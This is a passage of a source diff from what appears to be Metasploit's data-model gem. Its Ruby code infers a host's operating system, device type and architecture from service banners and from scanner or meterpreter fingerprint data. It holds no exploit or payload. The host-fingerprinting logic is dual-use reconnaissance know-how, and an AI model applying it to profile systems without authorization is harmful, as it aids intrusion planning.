wname['FreeBSD'].to_i + points + wtype['server'] = wtype['server'].to_i + points + when /sun_ssh/i + wname['Sun Solaris'] = wname['Sun Solaris'].to_i + points + wtype['server'] = wtype['server'].to_i + points + when /vshell|remotelyanywhere|freessh/i + wname['Microsoft Windows'] = wname['Microsoft Windows'].to_i + points + wtype['server'] = wtype['server'].to_i + points + + when /radware/i + wname['RadWare'] = wname['RadWare'].to_i + points + wtype['device'] = wtype['device'].to_i + points + + when /dropbear/i + wname['Linux'] = wname['Linux'].to_i + points + wtype['device'] = wtype['device'].to_i + points + + when /netscreen/i + wname['NetScreen'] = wname['NetScreen'].to_i + points + wtype['device'] = wtype['device'].to_i + points + + when /vpn3/ + wname['Cisco VPN 3000'] = wname['Cisco VPN 3000'].to_i + points + wtype['device'] = wtype['device'].to_i + points + + when /cisco/i + wname['Cisco IOS'] = wname['Cisco IOS'].to_i + points + wtype['device'] = wtype['device'].to_i + points + + when /mpSSH/ + wname['HP iLO'] = wname['HP iLO'].to_i + points + wtype['server'] = wtype['server'].to_i + points + end + when 'http' + points = 99 + case s.info + when /iSeries/ + wname['IBM iSeries'] = wname['IBM iSeries'].to_i + points + wtype['server'] = wtype['server'].to_i + points + + when /Mandrake/i + wname['Linux'] = wname['Linux'].to_i + points + wflav['Mandrake'] = wflav['Mandrake'].to_i + points + wtype['server'] = wtype['server'].to_i + points + + when /Mandriva/i + wname['Linux'] = wname['Linux'].to_i + points + wflav['Mandrake'] = wflav['Mandrake'].to_i + points + wtype['server'] = wtype['server'].to_i + points + + when /Ubuntu/i + wname['Linux'] = wname['Linux'].to_i + points + wflav['Ubuntu'] = wflav['Ubuntu'].to_i + points + wtype['server'] = wtype['server'].to_i + points + + when /Debian/i + wname['Linux'] = wname['Linux'].to_i + points + wflav['Debian'] = wflav['Debian'].to_i + points + wtype['server'] = wtype['server'].to_i + points + + when /Fedora/i + wname['Linux'] = wname['Linux'].to_i + points + wflav['Fedora'] = wflav['Fedora'].to_i + points + wtype['server'] = wtype['server'].to_i + points + + when /CentOS/i + wname['Linux'] = wname['Linux'].to_i + points + wflav['CentOS'] = wflav['CentOS'].to_i + points + wtype['server'] = wtype['server'].to_i + points + + when /RHEL/i + wname['Linux'] = wname['Linux'].to_i + points + wflav['RHEL'] = wflav['RHEL'].to_i + points + wtype['server'] = wtype['server'].to_i + points + + when /Red.?Hat/i + wname['Linux'] = wname['Linux'].to_i + points + wflav['Red Hat'] = wflav['Red Hat'].to_i + points + wtype['server'] = wtype['server'].to_i + points + + when /SuSE/i + wname['Linux'] = wname['Linux'].to_i + points + wflav['SUSE'] = wflav['SUSE'].to_i + points + wtype['server'] = wtype['server'].to_i + points + + when /TurboLinux/i + wname['Linux'] = wname['Linux'].to_i + points + wflav['TurboLinux'] = wflav['TurboLinux'].to_i + points + wtype['server'] = wtype['server'].to_i + points + + when /Gentoo/i + wname['Linux'] = wname['Linux'].to_i + points + wflav['Gentoo'] = wflav['Gentoo'].to_i + points + wtype['server'] = wtype['server'].to_i + points + + when /Conectiva/i + wname['Linux'] = wname['Linux'].to_i + points + wflav['Conectiva'] = wflav['Conectiva'].to_i + points + wtype['server'] = wtype['server'].to_i + points + + when /Asianux/i + wname['Linux'] = wname['Linux'].to_i + points + wflav['Asianux'] = wflav['Asianux'].to_i + points + wtype['server'] = wtype['server'].to_i + points + + when /Trustix/i + wname['Linux'] = wname['Linux'].to_i + points + wflav['Trustix'] = wflav['Trustix'].to_i + points + wtype['server'] = wtype['server'].to_i + points + + when /White Box/ + wname['Linux'] = wname['Linux'].to_i + points + wflav['White Box'] = wflav['White Box'].to_i + points + wtype['server'] = wtype['server'].to_i + points + + when /UnitedLinux/ + wname['Linux'] = wname['Linux'].to_i + points + wflav['UnitedLinux'] = wflav['UnitedLinux'].to_i + points + wtype['server'] = wtype['server'].to_i + points + + when /PLD\/Linux/ + wname['Linux'] = wname['Linux'].to_i + points + wflav['PLD/Linux'] = wflav['PLD/Linux'].to_i + points + wtype['server'] = wtype['server'].to_i + points + + when /Vine\/Linux/ + wname['Linux'] = wname['Linux'].to_i + points + wflav['Vine/Linux'] = wflav['Vine/Linux'].to_i + points + wtype['server'] = wtype['server'].to_i + points + + when /rPath/ + wname['Linux'] = wname['Linux'].to_i + points + wflav['rPath'] = wflav['rPath'].to_i + points + wtype['server'] = wtype['server'].to_i + points + + when /StartCom/ + wname['Linux'] = wname['Linux'].to_i + points + wflav['StartCom'] = wflav['StartCom'].to_i + points + wtype['server'] = wtype['server'].to_i + points + + when /linux/i + wname['Linux'] = wname['Linux'].to_i + points + wtype['server'] = wtype['server'].to_i + points + + when /PalmOS/ + wname['PalmOS'] = wname['PalmOS'].to_i + points + wtype['device'] = wtype['device'].to_i + points + + when /Microsoft[\x20\x2d]IIS\/[234]\.0/ + wname['Microsoft Windows NT 4.0'] = wname['Microsoft Windows NT 4.0'].to_i + points + wtype['server'] = wtype['server'].to_i + points + + when /Microsoft[\x20\x2d]IIS\/5\.0/ + wname['Microsoft Windows 2000'] = wname['Microsoft Windows 2000'].to_i + points + wtype['server'] = wtype['server'].to_i + points + + when /Microsoft[\x20\x2d]IIS\/5\.1/ + wname['Microsoft Windows XP'] = wname['Microsoft Windows XP'].to_i + points + wtype['server'] = wtype['server'].to_i + points + + when /Microsoft[\x20\x2d]IIS\/6\.0/ + wname['Microsoft Windows 2003'] = wname['Microsoft Windows 2003'].to_i + points + wtype['server'] = wtype['server'].to_i + points + + when /Microsoft[\x20\x2d]IIS\/7\.0/ + wname['Microsoft Windows 2008'] = wname['Microsoft Windows 2008'].to_i + points + wtype['server'] = wtype['server'].to_i + points + + when /Win32/i + wname['Microsoft Windows'] = wname['Microsoft Windows'].to_i + points + wtype['server'] = wtype['server'].to_i + points + + when /DD\-WRT ([^\s]+) /i + wname['Linux'] = wname['Linux'].to_i + points + wflav['DD-WRT'] = wflav['DD-WRT'].to_i + points + wvers[$1.strip] = wvers[$1.strip].to_i + points + wtype['server'] = wtype['server'].to_i + points + + when /Darwin/ + wname['Apple Mac OS X'] = wname['Apple Mac OS X'].to_i + points + + when /FreeBSD/i + wname['FreeBSD'] = wname['FreeBSD'].to_i + points + + when /OpenBSD/i + wname['OpenBSD'] = wname['OpenBSD'].to_i + points + + when /NetBSD/i + wname['NetBSD'] = wname['NetBSD'].to_i + points + + when /NetWare/i + wname['Novell NetWare'] = wname['Novell NetWare'].to_i + points + + when /OpenVMS/i + wname['OpenVMS'] = wname['OpenVMS'].to_i + points + + when /SunOS|Solaris/i + wname['Sun Solaris'] = wname['Sun Solaris'].to_i + points + + when /HP.?UX/i + wname['HP-UX'] = wname['HP-UX'].to_i + points + end + when 'snmp' + points = 103 + case s.info + when /^Sun SNMP Agent/ + wname['Sun Solaris'] = wname['Sun Solaris'].to_i + points + wtype['server'] = wtype['server'].to_i + points + + when /^SunOS ([^\s]+) ([^\s]+) / + # XXX 1/2 XXX what does this comment mean i wonder + wname['Sun Solaris'] = wname['Sun Solaris'].to_i + points + wtype['server'] = wtype['server'].to_i + points + + when /^Linux ([^\s]+) ([^\s]+) / + whost[$1] = whost[$1].to_i + points + wname['Linux ' + $2] = wname['Linux ' + $2].to_i + points + wvers[$2] = wvers[$2].to_i + points + arch = get_arch_from_string(s.info) + warch[arch] = warch[arch].to_i + points if arch + wtype['server'] = wtype['server'].to_i + points + + when /^Novell NetWare ([^\s]+)/ + wname['Novell NetWare ' + $1] = wname['Novell NetWare ' + $1].to_i + points + wvers[$1] = wvers[$1].to_i + points + arch = "x86" + warch[arch] = warch[arch].to_i + points + wtype['server'] = wtype['server'].to_i + points + + when /^Novell UnixWare ([^\s]+)/ + wname['Novell UnixWare ' + $1] = wname['Novell UnixWare ' + $1].to_i + points + wvers[$1] = wvers[$1].to_i + points + arch = "x86" + warch[arch] = warch[arch].to_i + points + wtype['server'] = wtype['server'].to_i + points + + when /^HP-UX ([^\s]+) ([^\s]+) / + # XXX + wname['HP-UX ' + $2] = wname['HP-UX ' + $2].to_i + points + wvers[$1] = wvers[$1].to_i + points + wtype['server'] = wtype['server'].to_i + points + + when /^IBM PowerPC.*Base Operating System Runtime AIX version: (\d+\.\d+)/ + wname['IBM AIX ' + $1] = wname['IBM AIX ' + $1].to_i + points + wvers[$1] = wvers[$1].to_i + points + wtype['server'] = wtype['server'].to_i + points + + when /^SCO TCP\/IP Runtime Release ([^\s]+)/ + wname['SCO UnixWare ' + $1] = wname['SCO UnixWare ' + $1].to_i + points + wvers[$1] = wvers[$1].to_i + points + wtype['server'] = wtype['server'].to_i + points + + when /.* IRIX version ([^\s]+)/ + wname['SGI IRIX ' + $1] = wname['SGI IRIX ' + $1].to_i + points + wvers[$1] = wvers[$1].to_i + points + wtype['server'] = wtype['server'].to_i + points + + when /^Unisys ([^\s]+) version ([^\s]+) kernel/ + wname['Unisys ' + $2] = wname['Unisys ' + $2].to_i + points + wvers[$2] = wvers[$2].to_i + points + whost[$1] = whost[$1].to_i + points + wtype['server'] = wtype['server'].to_i + points + + when /.*OpenVMS V([^\s]+) / + # XXX + wname['OpenVMS ' + $1] = wname['OpenVMS ' + $1].to_i + points + wvers[$1] = wvers[$1].to_i + points + wtype['server'] = wtype['server'].to_i + points + + when /^Hardware:.*Software: Windows NT Version ([^\s]+) / + wname['Microsoft Windows NT ' + $1] = wname['Microsoft Windows NT ' + $1].to_i + points + wtype['server'] = wtype['server'].to_i + points + + when /^Hardware:.*Software: Windows 2000 Version 5\.0/ + wname['Microsoft Windows 2000'] = wname['Microsoft Windows 2000'].to_i + points + wtype['server'] = wtype['server'].to_i + points + + when /^Hardware:.*Software: Windows 2000 Version 5\.1/ + wname['Microsoft Windows XP'] = wname['Microsoft Windows XP'].to_i + points + wtype['server'] = wtype['server'].to_i + points + + when /^Hardware:.*Software: Windows Version 5\.2/ + wname['Microsoft Windows 2003'] = wname['Microsoft Windows 2003'].to_i + points + wtype['server'] = wtype['server'].to_i + points + + # XXX: TODO 2008, Vista, Windows 7 + + when /^Microsoft Windows CE Version ([^\s]+)+/ + wname['Microsoft Windows CE ' + $1] = wname['Microsoft Windows CE ' + $1].to_i + points + wtype['client'] = wtype['client'].to_i + points + + when /^IPSO ([^\s]+) ([^\s]+) / + whost[$1] = whost[$1].to_i + points + wname['Nokia IPSO ' + $2] = wname['Nokia IPSO ' + $2].to_i + points + wvers[$2] = wvers[$2].to_i + points + arch = get_arch_from_string(s.info) + warch[arch] = warch[arch].to_s + points if arch + wtype['device'] = wtype['device'].to_i + points + + when /^Sun StorEdge/ + wname['Sun StorEdge'] = wname['Sun StorEdge'].to_i + points + wtype['device'] = wtype['device'].to_i + points + + when /^HP StorageWorks/ + wname['HP StorageWorks'] = wname['HP StorageWorks'].to_i + points + wtype['device'] = wtype['device'].to_i + points + + when /^Network Storage/ + # XXX + wname['Network Storage Router'] = wname['Network Storage Router'].to_i + points + wtype['device'] = wtype['device'].to_i + points + + when /Cisco Internetwork Operating System.*Version ([^\s]+)/ + vers = $1.split(/[,^\s]/)[0] + wname['Cisco IOS ' + vers] = wname['Cisco IOS ' + vers].to_i + points + wvers[vers] = wvers[vers].to_i + points + wtype['device'] = wtype['device'].to_i + points + + when /Cisco Catalyst.*Version ([^\s]+)/ + vers = $1.split(/[,^\s]/)[0] + wname['Cisco CatOS ' + vers] = wname['Cisco CatOS ' + vers].to_i + points + wvers[vers] = wvers[vers].to_i + points + wtype['device'] = wtype['device'].to_i + points + + when /Cisco 761.*Version ([^\s]+)/ + vers = $1.split(/[,^\s]/)[0] + wname['Cisco 761 ' + vers] = wname['Cisco 761 ' + vers].to_i + points + wvers[vers] = wvers[vers].to_i + points + wtype['device'] = wtype['device'].to_i + points + + when /Network Analysis Module.*Version ([^\s]+)/ + vers = $1.split(/[,^\s]/)[0] + wname['Cisco NAM ' + vers] = wname['Cisco NAM ' + vers].to_i + points + wvers[vers] = wvers[vers].to_i + points + wtype['device'] = wtype['device'].to_i + points + + when /VPN 3000 Concentrator Series Version ([^\s]+)/ + vers = $1.split(/[,^\s]/)[0] + wname['Cisco VPN 3000 ' + vers] = wname['Cisco VPN 3000 ' + vers].to_i + points + wvers[vers] = wvers[vers].to_i + points + wtype['device'] = wtype['device'].to_i + points + + when /ProCurve.*Switch/ + wname['3Com ProCurve Switch'] = wname['3Com ProCurve Switch'].to_i + points + wtype['device'] = wtype['device'].to_i + points + + when /ProCurve.*Access Point/ + wname['3Com Access Point'] = wname['3Com Access Point'].to_i + points + wtype['device'] = wtype['device'].to_i + points + + when /3Com.*Access Point/i + wname['3Com Access Point'] = wname['3Com Access Point'].to_i + points + wtype['device'] = wtype['device'].to_i + points + + when /ShoreGear/ + wname['ShoreTel Appliance'] = wname['ShoreTel Appliance'].to_i + points + wtype['device'] = wtype['device'].to_i + points + + when /firewall/i + wname['Unknown Firewall'] = wname['Unknown Firewall'].to_i + points + wtype['device'] = wtype['device'].to_i + points + + when /phone/i + wname['Unknown Phone'] = wname['Unknown Phone'].to_i + points + wtype['device'] = wtype['device'].to_i + points + + when /router/i + wname['Unknown Router'] = wname['Unknown Router'].to_i + points + wtype['device'] = wtype['device'].to_i + points + + when /switch/i + wname['Unknown Switch'] = wname['Unknown Switch'].to_i + points + wtype['device'] = wtype['device'].to_i + points + # + # Printer Signatures + # + when /^HP ETHERNET MULTI-ENVIRONMENT/ + wname['HP Printer'] = wname['HP Printer'].to_i + points + wtype['printer'] = wtype['printer'].to_i + points + when /Canon/i + wname['Canon Printer'] = wname['Canon Printer'].to_i + points + wtype['printer'] = wtype['printer'].to_i + points + when /Epson/i + wname['Epson Printer'] = wname['Epson Printer'].to_i + points + wtype['printer'] = wtype['printer'].to_i + points + when /ExtendNet/i + wname['ExtendNet Printer'] = wname['ExtendNet Printer'].to_i + points + wtype['printer'] = wtype['printer'].to_i + points + when /Fiery/i + wname['Fiery Printer'] = wname['Fiery Printer'].to_i + points + wtype['printer'] = wtype['printer'].to_i + points + when /Konica/i + wname['Konica Printer'] = wname['Konica Printer'].to_i + points + wtype['printer'] = wtype['printer'].to_i + points + when /Lanier/i + wname['Lanier Printer'] = wname['Lanier Printer'].to_i + points + wtype['printer'] = wtype['printer'].to_i + points + when /Lantronix/i + wname['Lantronix Printer'] = wname['Lantronix Printer'].to_i + points + wtype['printer'] = wtype['printer'].to_i + points + when /Lexmark/i + wname['Lexmark Printer'] = wname['Lexmark Printer'].to_i + points + wtype['printer'] = wtype['printer'].to_i + points + when /Magicolor/i + wname['Magicolor Printer'] = wname['Magicolor Printer'].to_i + points + wtype['printer'] = wtype['printer'].to_i + points + when /Minolta/i + wname['Minolta Printer'] = wname['Minolta Printer'].to_i + points + wtype['printer'] = wtype['printer'].to_i + points + when /NetJET/i + wname['NetJET Printer'] = wname['NetJET Printer'].to_i + points + wtype['printer'] = wtype['printer'].to_i + points + when /OKILAN/i + wname['OKILAN Printer'] = wname['OKILAN Printer'].to_i + points + wtype['printer'] = wtype['printer'].to_i + points + when /Phaser/i + wname['Phaser Printer'] = wname['Phaser Printer'].to_i + points + wtype['printer'] = wtype['printer'].to_i + points + when /PocketPro/i + wname['PocketPro Printer'] = wname['PocketPro Printer'].to_i + points + wtype['printer'] = wtype['printer'].to_i + points + when /Ricoh/i + wname['Ricoh Printer'] = wname['Ricoh Printer'].to_i + points + wtype['printer'] = wtype['printer'].to_i + points + when /Savin/i + wname['Savin Printer'] = wname['Savin Printer'].to_i + points + wtype['printer'] = wtype['printer'].to_i + points + when /SHARP AR/i + wname['SHARP Printer'] = wname['SHARP Printer'].to_i + points + wtype['printer'] = wtype['printer'].to_i + points + when /Star Micronix/i + wname['Star Micronix Printer'] = wname['Star Micronix Printer'].to_i + points + wtype['printer'] = wtype['printer'].to_i + points + when /Source Tech/i + wname['Source Tech Printer'] = wname['Source Tech Printer'].to_i + points + wtype['printer'] = wtype['printer'].to_i + points + when /Xerox/i + wname['Xerox Printer'] = wname['Xerox Printer'].to_i + points + wtype['printer'] = wtype['printer'].to_i + points + when /^Brother/i + wname['Brother Printer'] = wname['Brother Printer'].to_i + points + wtype['printer'] = wtype['printer'].to_i + points + when /^Axis.*Network Print/i + wname['Axis Printer'] = wname['Axis Printer'].to_i + points + wtype['printer'] = wtype['printer'].to_i + points + when /^Prestige/i + wname['Prestige Printer'] = wname['Prestige Printer'].to_i + points + wtype['printer'] = wtype['printer'].to_i + points + when /^ZebraNet/i + wname['ZebraNet Printer'] = wname['ZebraNet Printer'].to_i + points + wtype['printer'] = wtype['printer'].to_i + points + when /e\-STUDIO/i + wname['eStudio Printer'] = wname['eStudio Printer'].to_i + points + wtype['printer'] = wtype['printer'].to_i + points + when /^Gestetner/i + wname['Gestetner Printer'] = wname['Gestetner Printer'].to_i + points + wtype['printer'] = wtype['printer'].to_i + points + when /IBM.*Print/i + wname['IBM Printer'] = wname['IBM Printer'].to_i + points + wtype['printer'] = wtype['printer'].to_i + points + when /HP (Color|LaserJet|InkJet)/i + wname['HP Printer'] = wname['HP Printer'].to_i + points + wtype['printer'] = wtype['printer'].to_i + points + when /Dell (Color|Laser|Ink)/i + wname['Dell Printer'] = wname['Dell Printer'].to_i + points + wtype['printer'] = wtype['printer'].to_i + points + when /Print/i + wname['Unknown Printer'] = wname['Unknown Printer'].to_i + points + wtype['printer'] = wtype['printer'].to_i + points + end # End of s.info for SNMP + + when 'telnet' + points = 105 + case s.info + when /IRIX/ + wname['SGI IRIX'] = wname['SGI IRIX'].to_i + points + when /AIX/ + wname['IBM AIX'] = wname['IBM AIX'].to_i + points + when /(FreeBSD|OpenBSD|NetBSD)\/(.*) / + wname[$1] = wname[$1].to_i + points + arch = get_arch_from_string($2) + warch[arch] = warch[arch].to_i + points + when /Ubuntu (\d+(\.\d+)+)/ + wname['Linux'] = wname['Linux'].to_i + points + wflav['Ubuntu'] = wflav['Ubuntu'].to_i + points + wvers[$1] = wvers[$1].to_i + points + when /User Access Verification/ + wname['Cisco IOS'] = wname['Cisco IOS'].to_i + points + when /Microsoft/ + wname['Microsoft Windows'] = wname['Microsoft Windows'].to_i + points + end # End of s.info for TELNET + wtype['server'] = wtype['server'].to_i + points + + when 'smtp' + points = 103 + case s.info + when /ESMTP.*SGI\.8/ + wname['SGI IRIX'] = wname['SGI IRIX'].to_i + points + wtype['server'] = wtype['server'].to_i + points + end # End of s.info for SMTP + + when 'https' + points = 101 + case s.info + when /(VMware\s(ESXi?)).*\s([\d\.]+)/ + # Very reliable fingerprinting from our own esx_fingerprint module + wname[$1] = wname[$1].to_i + (points * 5) + wflav[$3] = wflav[$3].to_i + (points * 5) + wtype['device'] = wtype['device'].to_i + points + end # End of s.info for HTTPS + + when 'netbios' + points = 201 + case s.info + when /W2K3/i + wname['Microsoft Windows 2003'] = wname['Microsoft Windows 2003'].to_i + points + wtype['server'] = wtype['server'].to_i + points + when /W2K8/i + wname['Microsoft Windows 2008'] = wname['Microsoft Windows 2008'].to_i + points + wtype['server'] = wtype['server'].to_i + points + end # End of s.info for NETBIOS + + when 'dns' + points = 101 + case s.info + when 'Microsoft DNS' + wname['Microsoft Windows'] = wname['Microsoft Windows'].to_i + points + wtype['server'] = wtype['server'].to_i + points + end # End of s.info for DNS + end # End of s.name case + # End of Services + end + + # + # Report the best match here + # + best_match = {} + best_match[:os_name] = wname.keys.sort{|a,b| wname[b] <=> wname[a]}[0] + best_match[:purpose] = wtype.keys.sort{|a,b| wtype[b] <=> wtype[a]}[0] + best_match[:os_flavor] = wflav.keys.sort{|a,b| wflav[b] <=> wflav[a]}[0] + best_match[:os_sp] = wvers.keys.sort{|a,b| wvers[b] <=> wvers[a]}[0] + best_match[:arch] = warch.keys.sort{|a,b| warch[b] <=> warch[a]}[0] + best_match[:name] = whost.keys.sort{|a,b| whost[b] <=> whost[a]}[0] + best_match[:os_lang] = wlang.keys.sort{|a,b| wlang[b] <=> wlang[a]}[0] + + best_match[:os_flavor] ||= host[:os_flavor] || "" + if best_match[:os_name] + # Handle cases where the flavor contains the base name + # Don't use gsub!() here because the string was a hash key in a + # previously life and gets frozen on 1.9.1, see #4128 + best_match[:os_flavor] = best_match[:os_flavor].gsub(best_match[:os_name], '') + end + + # If we didn't get anything, use whatever the host already has. + # Failing that, fallback to "Unknown" + best_match[:os_name] ||= host[:os_name] || 'Unknown' + best_match[:purpose] ||= 'device' + + [:os_name, :purpose, :os_flavor, :os_sp, :arch, :name, :os_lang].each do |host_attr| + next if host.attribute_locked? host_attr + if best_match[host_attr] + host[host_attr] = Rex::Text.ascii_safe_hex(best_match[host_attr]) + end + end + + host.save if host.changed? + end + + # Determine if the fingerprint data is readable. If not, it nearly always + # means that there was a problem with the YAML or the Marshal'ed data, + # so let's log that for later investigation. + def validate_fingerprint_data(fp) + if fp.data.kind_of?(Hash) and !fp.data.empty? + return true + elsif fp.ntype == "postgresql.fingerprint" + # Special case postgresql.fingerprint; it's always a string, + # and should not be used for OS fingerprinting (yet), so + # don't bother logging it. TODO: fix os fingerprint finding, this + # name collision seems silly. + return false + else + dlog("Could not validate fingerprint data: #{fp.inspect}") + return false + end + end + + protected + + # + # Convert a host.os.*_fingerprint Note into a hash containing the standard os_* fields + # + # Also includes a :certainty which is a float from 0 - 1.00 indicating the + # scanner's confidence in its fingerprint. If the particular scanner does + # not provide such information, defaults to 0.80. + # + # TODO: This whole normalize scanner procedure needs to be shoved off to its own + # mixin. It's far too long and convoluted, has a ton of repeated code, and is + # a massive hassle to update with new fingerprints. + def normalize_scanner_fp(fp) + return {} if not validate_fingerprint_data(fp) + ret = {} + data = fp.data + case fp.ntype + when 'host.os.session_fingerprint' + # These come from meterpreter sessions' client.sys.config.sysinfo + case data[:os] + when /Windows/ + ret.update(parse_windows_os_str(data[:os])) + when /Linux ([^[:space:]]*) ([^[:space:]]*) .* (\(.*\))/ + ret[:os_name] = "Linux" + ret[:name] = $1 + ret[:os_sp] = $2 + ret[:arch] = get_arch_from_string($3) + else + ret[:os_name] = data[:os] + end + ret[:arch] = data[:arch] if data[:arch] + ret[:name] = data[:name] if data[:name] + + when 'host.os.nmap_fingerprint', 'host.os.mbsa_fingerprint' + # :os_vendor=>"Microsoft" :os_family=>"Windows" :os_version=>"2000" :os_accuracy=>"94" + # + # :os_match=>"Microsoft Windows Vista SP0 or SP1, Server 2008, or Windows 7 Ultimate (build 7000)" + # :os_vendor=>"Microsoft" :os_family=>"Windows" :os_version=>"7" :os_accuracy=>"100" + ret[:certainty] = data[:os_accuracy].to_f / 100.0 + if (data[:os_vendor] == data[:os_family]) + ret[:os_name] = data[:os_family] + else + ret[:os_name] = data[:os_vendor] + " " + data[:os_family] + end + ret[:os_flavor] = data[:os_version] + ret[:name] = data[:hostname] if data[:hostname] + + when 'host.os.nexpose_fingerprint' + # :family=>"Windows" :certainty=>"0.85" :vendor=>"Microsoft" :product=>"Windows 7 Ultimate Edition" + # :family=>"Linux" :certainty=>"0.64" :vendor=>"Linux" :product=>"Linux" + # :family=>"Linux" :certainty=>"0.80" :vendor=>"Ubuntu" :product=>"Linux" + # :family=>"IOS" :certainty=>"0.80" :vendor=>"Cisco" :product=>"IOS" + # :family=>"embedded" :certainty=>"0.61" :vendor=>"Linksys" :product=>"embedded" + ret[:certainty] = data[:certainty].to_f + case data[:family] + when /AIX|ESX|Mac OS X|OpenSolaris|Solaris|IOS|Linux/ + if data[:vendor] == data[:family] + ret[:os_name] = data[:vendor] + else + # family often contains the vendor string, so rip it out to + # avoid useless duplication + ret[:os_name] = data[:vendor].to_s + " " + data[:family].to_s.gsub(data[:vendor].to_s, '').strip + end + when "Windows" + ret[:os_name] = "Microsoft Windows" + if data[:product] + if data[:product][/2008/] && data[:version].to_i == 7 + ret[:os_flavor] = "Windows 7" + ret[:type] = "client" + else + ret[:os_flavor] = data[:product].gsub("Windows", '').strip + ret[:os_sp] = data[:version] if data[:version] + if data[:product] + ret[:type] = "server" if data[:product][/Server/] + ret[:type] = "client" if data[:product][/^(XP|ME)$/] + end + end + end + when "embedded" + ret[:os_name] = data[:vendor] + else + ret[:os_name] = data[:vendor] + end + ret[:arch] = get_arch_from_string(data[:arch]) if data[:arch] + ret[:arch] ||= get_arch_from_string(data[:desc]) if data[:desc] + + when 'host.os.retina_fingerprint' + # :os=>"Windows Server 2003 (X64), Service Pack 2" + case data[:os] + when /Windows/ + ret.update(parse_windows_os_str(data[:os])) + else + # No idea what this looks like if it isn't windows. Just store + # the whole thing and hope for the best. XXX: Ghetto. =/ + ret[:os_name] = data[:os] + end + when 'host.os.nessus_fingerprint' + # :os=>"Microsoft Windows 2000 Advanced Server (English)" + # :os=>"Microsoft Windows 2000\nMicrosoft Windows XP" + # :os=>"Linux Kernel 2.6" + # :os=>"Sun Solaris 8" + # :os=>"IRIX 6.5" + + # Nessus sometimes jams multiple OS names together with a newline. + oses = data[:os].split(/\n/) + if oses.length > 1 + # Multiple fingerprints means Nessus wasn't really sure, reduce + # the certainty accordingly + ret[:certainty] = 0.5 + else + ret[:certainty] = 0.8 + end + + # Since there is no confidence associated with them, the best we + # can do is just take the first one. + case oses.first + when /Windows/ + ret.update(parse_windows_os_str(data[:os])) + + when /(2\.[46]\.\d+[-a-zA-Z0-9]+)/ + # Linux kernel version + ret[:os_name] = "Linux" + ret[:os_sp] = $1 + when /(.*)?((\d+\.)+\d+)$/ + # Then we don't necessarily know what the os is, but this + # fingerprint has some version information at the end, pull it + # off. + # When Nessus doesn't know what kind of linux it has, it gives an os like + # "Linux Kernel 2.6" + # The "Kernel" string is useless, so cut it off. + ret[:os_name] = $1.gsub("Kernel", '').strip + ret[:os_sp] = $2 + else + ret[:os_name] = oses.first + end + + ret[:name] = data[:hname] + when 'host.os.qualys_fingerprint' + # :os=>"Microsoft Windows 2000" + # :os=>"Windows 2003" + # :os=>"Microsoft Windows XP Professional SP3" + # :os=>"Ubuntu Linux" + # :os=>"Cisco IOS 12.0(3)T3" + case data[:os] + when /Windows/ + ret.update(parse_windows_os_str(data[:os])) + else + parts = data[:os].split(/\s+/, 3) + ret[:os_name] = "" + ret[:os_name] = parts[0] if parts[0] + ret[:os_name] << " " + parts[1] if parts[1] + ret[:os_sp] = parts[2] if parts[2] + end + # XXX: We should really be using smb_version's stored fingerprints + # instead of parsing the service info manually. Disable for now so we + # don't count smb twice. + #when 'smb.fingerprint' + # # smb_version is kind enough to store everything we need directly + # ret.merge(fp.data) + # # If it's windows, this should be a pretty high-confidence + # # fingerprint. Otherwise, it's samba which doesn't give us much of + # # anything in most cases. + # ret[:certainty] = 1.0 if fp.data[:os_name] =~ /Windows/ + when 'host.os.fusionvm_fingerprint' + case data[:os] + when /Windows/ + ret.update(parse_windows_os_str(data[:os])) + when /Linux ([^[:space:]]*) ([^[:space:]]*) .* (\(.*\))/ + ret[:os_name] = "Linux" + ret[:name] = $1 + ret[:os_sp] = $2 + ret[:arch] = get_arch_from_string($3) + else + ret[:os_name] = data[:os] + end + ret[:arch] = data[:arch] if data[:arch] + ret[:name] = data[:name] if data[:name] + else + # If you've fallen through this far, you've hit a generalized + # pass-through fingerprint parser. + ret[:os_name] = data[:os_name] || data[:os] || data[:os_fingerprint] || "" + ret[:type] = data[:os_purpose] if data[:os_purpose] + ret[:arch] = data[:os_arch] if data[:os_arch] + ret[:certainty] = data[:os_certainty] || 0.5 + end + ret[:certainty] ||= 0.8 + ret + end + + # + # Take a windows version string and return a hash with fields suitable for + # Host this object's version fields. + # + # A few example strings that this will have to parse: + # sessions + # Windows XP (Build 2600, Service Pack 3). + # Windows .NET Server (Build 3790). + # Windows 2008 (Build 6001, Service Pack 1). + # retina + # Windows Server 2003 (X64), Service Pack 2 + # nessus + # Microsoft Windows 2000 Advanced Server (English) + # qualys + # Microsoft Windows XP Professional SP3 + # Windows 2003 + # + # Note that this list doesn't include nexpose or nmap, since they are + # both kind enough to give us the various strings in seperate pieces + # that we don't have to parse out manually. + # + def parse_windows_os_str(str) + ret = {} + + ret[:os_name] = "Microsoft Windows" + arch = get_arch_from_string(str) + ret[:arch] = arch if arch + + if str =~ /(Service Pack|SP) ?(\d+)/ + ret[:os_sp] = "SP#{$2}" + end + + # Flavor + case str + when /\.NET Server/ + ret[:os_flavor] = "2003" + when /(XP|2000 Advanced Server|2000|2003|2008|SBS|Vista|7 .* Edition|7)/ + ret[:os_flavor] = $1 + else + # If we couldn't pull out anything specific for the flavor, just cut + # off the stuff we know for sure isn't it and hope for the best + ret[:os_flavor] ||= str.gsub(/(Microsoft )?Windows|(Service Pack|SP) ?(\d+)/, '').strip + end + + if str =~ /NT|2003|2008|SBS|Server/ + ret[:type] = 'server' + else + ret[:type] = 'client' + end + + ret + end + + # A case switch to return a normalized arch based on a given string. + def get_arch_from_string(str) + case str + when /x64|amd64|x86_64/i + "x64" + when /x86|i[3456]86/i + "x86" + when /PowerPC|PPC|POWER|ppc/ + "ppc" + when /SPARC/i + "sparc" + when /MIPS/i + "mips" + when /ARM/i + "arm" + else + nil + end + end +end \ No newline at end of file diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/lib/metasploit_data_models.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/lib/metasploit_data_models.rb index 2605aa3d41..0513b84756 100755 --- a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/lib/metasploit_data_models.rb +++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/lib/metasploit_data_models.rb @@ -1,63 +1,60 @@ -require "active_record" -require "active_support" -require "active_support/all" -require "shellwords" +# +# Core +# +require 'shellwords' -require "metasploit_data_models/version" -require "metasploit_data_models/serialized_prefs" -require "metasploit_data_models/base64_serializer" +# +# Gems +# +require 'active_record' +require 'active_support' +require 'active_support/all' +require 'active_support/dependencies' -require 